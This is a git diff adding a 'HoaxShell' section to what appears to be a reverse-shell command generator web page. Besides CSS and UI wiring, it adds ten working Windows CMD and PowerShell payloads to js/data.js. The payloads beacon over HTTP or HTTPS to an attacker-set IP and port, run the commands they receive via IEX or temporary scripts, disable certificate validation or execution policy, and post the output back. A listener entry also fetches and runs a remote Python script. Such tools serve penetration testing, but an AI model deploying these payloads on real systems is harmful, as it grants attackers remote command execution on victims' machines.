diff --git a/css/dark-mode.css b/css/dark-mode.css index 8773912..bd715c5 100644 --- a/css/dark-mode.css +++ b/css/dark-mode.css @@ -69,6 +69,14 @@ _:-ms-fullscreen, :root body { max-height: 20rem; } +#hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(0, 0, 0, 0.75); + background-color: rgb(70, 70, 70); + max-height: 20rem; +} + #theme-selector { width: 100px; height: 30px; @@ -136,4 +144,4 @@ h2 { .github-corner .octo-arm { animation: octocat-wave 560ms ease-in-out } -} \ No newline at end of file +} diff --git a/css/light-mode.css b/css/light-mode.css index e848302..cd3d619 100644 --- a/css/light-mode.css +++ b/css/light-mode.css @@ -103,6 +103,15 @@ Ain't got time for using CSS the right way. !important everything! max-height: 20rem; } +[data-theme="light"] #hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(209, 209, 209, 0.75); + background-color: rgb(45, 139, 135); + color: #000; + max-height: 20rem; +} + [data-theme="light"] .custom-select { background-color: #f2f2f2; color: #000; diff --git a/css/meme-mode.css b/css/meme-mode.css index 205ec60..4a1a796 100644 --- a/css/meme-mode.css +++ b/css/meme-mode.css @@ -108,6 +108,15 @@ Ain't got time for using CSS the right way. !important everything! max-height: 20rem; } +[data-theme="meme"] #hoaxshell-command { + border: none !important; + border-radius: 5px; + box-shadow: 10px 10px 20px 0px rgba(153, 28, 143, 0.75); + background-color: rgb(45, 139, 135); + color: #000; + max-height: 20rem; +} + [data-theme="meme"] .custom-select { background-color: #f1c6ce; color: #000; @@ -330,4 +339,4 @@ Ain't got time for using CSS the right way. !important everything! 100% { color: orange; } -} \ No newline at end of file +} diff --git a/index.html b/index.html index 8a6bc93..89d2662 100644 --- a/index.html +++ b/index.html @@ -192,6 +192,10 @@ MSFVenom +
  • + HoaxShell +
    • + + + + +
    +
    +
    + +
    +
    + +
    +
    + +
    +
    + + +
    + + +
    +
    + 
    🚀
    + 
    
+                                            
    
+                                        
    
+
+                                        
    
+
+                                            
+                                            
+
+                                            
+                                            
+                                        
    
+                                    
    
+                                    
+                            
    
+                        
    
+                    
    
+                
    
+            
    
+            
     
 
     
diff --git a/js/data.js b/js/data.js
index 7cb152f..bad3d2b 100644
--- a/js/data.js
+++ b/js/data.js
@@ -2,7 +2,8 @@
 const CommandType = {
     'ReverseShell': 'ReverseShell',
     'BindShell': 'BindShell',
-    'MSFVenom': 'MSFVenom'
+    'MSFVenom': 'MSFVenom',
+    'HoaxShell': 'HoaxShell'
 };
 
 const withCommandType = function (commandType, elements) {
@@ -471,11 +472,68 @@ const msfvenomCommands =  withCommandType(
     ]
 );
 
+
+const hoaxShellCommands =  withCommandType(
+    CommandType.HoaxShell,
+    [
+        {
+            "name": "Windows CMD cURL",
+            "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=http://&&curl !protocol!!ip!/eb6a44aa -H !sid! > NUL && for /L %i in (0) do (curl -s !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell IEX",
+            "command": "$s='{ip}:{port}';$i='14f30f27-650c00d7-fef40df7';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/14f30f27 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/650c00d7 -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/fef40df7 -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell IEX Constr Lang Mode",
+            "command": "$s='{ip}:{port}';$i='bf5e666f-5498a73c-34007c82';$p='http://';$v=IRM -UseBasicParsing -Uri $p$s/bf5e666f -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/5498a73c -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=IEX $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/34007c82 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell Outfile",
+            "command": "$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell Outfile Constr Lang Mode",
+            "command": "$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='http://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "Windows CMD cURL https",
+            "command": "@echo off&cmd /V:ON /C \"SET ip={ip}:{port}&&SET sid=\"Authorization: eb6a44aa-8acc1e56-629ea455\"&&SET protocol=https://&&curl -fs -k !protocol!!ip!/eb6a44aa -H !sid! > NUL & for /L %i in (0) do (curl -fs -k !protocol!!ip!/8acc1e56 -H !sid! > !temp!\cmd.bat & type !temp!\cmd.bat | findstr None > NUL & if errorlevel 1 ((!temp!\cmd.bat > !tmp!\out.txt 2>&1) & curl -fs -k !protocol!!ip!/629ea455 -X POST -H !sid! --data-binary @!temp!\out.txt > NUL)) & timeout 1\" > NUL",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell IEX https",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='1cdbb583-f96894ff-f99b8edc';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/1cdbb583 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/f96894ff -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/f99b8edc -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell Constr Lang Mode IEX https",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='11e6bc4b-fefb1eab-68a9612e';$p='https://';$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/11e6bc4b -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/fefb1eab -Headers @{\"Authorization\"=$i});if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/68a9612e -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell Outfile https",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='add29918-6263f3e6-2f810c1e';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=Invoke-RestMethod -UseBasicParsing -Uri $p$s/add29918 -Headers @{\"Authorization\"=$i};while ($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/6263f3e6 -Headers @{\"Authorization\"=$i});if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-RestMethod -Uri $p$s/2f810c1e -Method POST -Headers @{\"Authorization\"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}",
+            "meta": ["windows"]
+        },
+        {
+            "name": "PowerShell Outfile Constr Lang Mode https",
+            "command": "add-type @\"\nusing System.Net;using System.Security.Cryptography.X509Certificates;\npublic class TrustAllCertsPolicy : ICertificatePolicy {public bool CheckValidationResult(\nServicePoint srvPoint, X509Certificate certificate,WebRequest request, int certificateProblem) {return true;}}\n\"@\n[System.Net.ServicePointManager]::CertificatePolicy = New-Object TrustAllCertsPolicy\n$s='{ip}:{port}';$i='e030d4f6-9393dc2a-dd9e00a7';$p='https://';$f=\"C:\Users\$env:USERNAME\.local\hack.ps1\";$v=IRM -UseBasicParsing -Uri $p$s/e030d4f6 -Headers @{\"Authorization\"=$i};while ($true){$c=(IRM -UseBasicParsing -Uri $p$s/9393dc2a -Headers @{\"Authorization\"=$i}); if ($c -eq 'exit') {del $f;exit} elseif ($c -ne 'None') {echo \"$c\" | out-file -filepath $f;$r=powershell -ep bypass $f -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=IRM -Uri $p$s/dd9e00a7 -Method POST -Headers @{\"Authorization\"=$i} -Body ($e+$r)} sleep 0.8}",
+            "meta": ["windows"]
+        }
+    ]
+);
+
 const rsgData = {
 
     listenerCommands: [
         ['nc', 'nc -lvnp {port}'],
-		  ['busybox nc', 'busybox nc -lp {port}'],
+	['busybox nc', 'busybox nc -lp {port}'],
         ['ncat', 'ncat -lvnp {port}'],
         ['ncat.exe', 'ncat.exe -lvnp {port}'],
         ['ncat (TLS)', 'ncat --ssl -lvnp {port}'],
@@ -487,7 +545,8 @@ const rsgData = {
         ['socat', 'socat -d -d TCP-LISTEN:{port} STDOUT'],
         ['socat (TTY)', 'socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{port}'],
         ['powercat', 'powercat -l -p {port}'],
-        ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"']
+        ['msfconsole', 'msfconsole -q -x "use multi/handler; set payload {payload}; set lhost {ip}; set lport {port}; exploit"'],
+        ['hoaxshell', 'python3 -c "$(curl -s https://raw.githubusercontent.com/t3l3machus/hoaxshell/main/revshells/hoaxshell-listener.py)" -t {type} -p {port}']
     ],
 
     shells: ['sh', '/bin/sh', 'bash', '/bin/bash', 'cmd', 'powershell', 'pwsh', 'ash', 'bsh', 'csh', 'ksh', 'zsh', 'pdksh', 'tcsh', 'mksh', 'dash'],
@@ -501,9 +560,25 @@ const rsgData = {
     reverseShellCommands: [
         ...reverseShellCommands,
         ...bindShellCommands,
-        ...msfvenomCommands
+        ...msfvenomCommands,
+        ...hoaxShellCommands
     ]
-}
+};
+
+const hoaxshell_listener_types = {
+	
+	"Windows CMD cURL" : "cmd-curl",
+	"PowerShell IEX" : "ps-iex",
+	"PowerShell IEX Constr Lang Mode" : "ps-iex-cm",
+	"PowerShell Outfile" : "ps-outfile",
+	"PowerShell Outfile Constr Lang Mode" : "ps-outfile-cm",
+	"Windows CMD cURL https" : "cmd-curl -c /your/cert.pem -k /your/key.pem",
+	"PowerShell IEX https" : "ps-iex -c /your/cert.pem -k /your/key.pem",
+	"PowerShell IEX Constr Lang Mode https" : "ps-iex-cm -c /your/cert.pem -k /your/key.pem",
+	"PowerShell Outfile https" : "ps-outfile -c /your/cert.pem -k /your/key.pem",
+	"PowerShell Outfile Constr Lang Mode https" : "ps-outfile-cm -c /your/cert.pem -k /your/key.pem"	
+	
+};
 
 // Export the data for use within netlify functions / node
 if (typeof exports !== 'undefined') {
diff --git a/js/script.js b/js/script.js
index e9d1a41..da6ef86 100644
--- a/js/script.js
+++ b/js/script.js
@@ -10,6 +10,7 @@ const listenerCommand = document.querySelector("#listener-command");
 const reverseShellCommand = document.querySelector("#reverse-shell-command");
 const bindShellCommand = document.querySelector("#bind-shell-command");
 const msfVenomCommand = document.querySelector("#msfvenom-command");
+const hoaxShellCommand = document.querySelector("#hoaxshell-command");
 
 const FilterType = {
     'All': 'all',
@@ -54,6 +55,15 @@ encoding: "None"
     });
 });
 
+
+document.querySelector("#hoaxshell-tab").addEventListener("click", () => {
+    document.querySelector("#hoaxshell-selection").innerHTML = "";
+    rsg.setState({
+        commandType: CommandType.HoaxShell,
+		encoding: "None"
+    });
+});
+
 var rawLinkButtons = document.querySelectorAll('.raw-listener');
 for (const button of rawLinkButtons) {
     button.addEventListener("click", () => {
@@ -93,6 +103,7 @@ const rsg = {
     ip: query.get('ip') || localStorage.getItem('ip') || '10.10.10.10',
     port: query.get('port') || localStorage.getItem('port') || 9001,
     payload: query.get('payload') || localStorage.getItem('payload') || 'windows/x64/meterpreter/reverse_tcp',
+    payload: query.get('type') || localStorage.getItem('type') || 'cmd-curl',
     shell: query.get('shell') || localStorage.getItem('shell') || rsgData.shells[0],
     listener: query.get('listener') || localStorage.getItem('listener') || rsgData.listenerCommands[0][1],
     encoding: query.get('encoding') || localStorage.getItem('encoding') || 'None',
@@ -100,6 +111,7 @@ const rsg = {
         [CommandType.ReverseShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.ReverseShell })[0].name,
         [CommandType.BindShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.BindShell })[0].name,
         [CommandType.MSFVenom]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.MSFVenom })[0].name,
+        [CommandType.HoaxShell]: filterCommandData(rsgData.reverseShellCommands, { commandType: CommandType.HoaxShell })[0].name,
     },
     commandType: CommandType.ReverseShell,
     filter: FilterType.All,
@@ -116,6 +128,10 @@ const rsg = {
         [CommandType.MSFVenom]: {
             listSelection: '#msfvenom-selection',
             command: '#msfvenom-command'
+        },
+        [CommandType.HoaxShell]: {
+            listSelection: '#hoaxshell-selection',
+            command: '#hoaxshell-command'
         }
     },
 
@@ -169,6 +185,16 @@ const rsg = {
 
     },
 
+    getType: () => {
+        if (rsg.commandType === 'HoaxShell') {
+            let cmd_name = rsg.getSelectedCommandName();
+            return hoaxshell_listener_types[cmd_name];
+        }
+
+        return 'cmd-curl'
+
+    },
+
     generateReverseShellCommand: () => {
         let command
 
@@ -358,6 +384,7 @@ const rsg = {
         command = command.replace('{port}', rsg.getPort())
         command = command.replace('{ip}', rsg.getIP())
         command = command.replace('{payload}', rsg.getPayload())
+        command = command.replace('{type}', rsg.getType())
 
         if (rsg.getPort() < 1024) {
             privilegeWarning.style.visibility = "visible";
@@ -456,6 +483,10 @@ document.querySelector('#copy-msfvenom-command').addEventListener('click', () =>
     rsg.copyToClipboard(msfVenomCommand.innerText)
 })
 
+document.querySelector('#copy-hoaxshell-command').addEventListener('click', () => {
+    rsg.copyToClipboard(hoaxShellCommand.innerText)
+})
+
 var downloadButton = document.querySelectorAll(".download-svg");
 for (const Dbutton of downloadButton) {
     Dbutton.addEventListener("click", () => {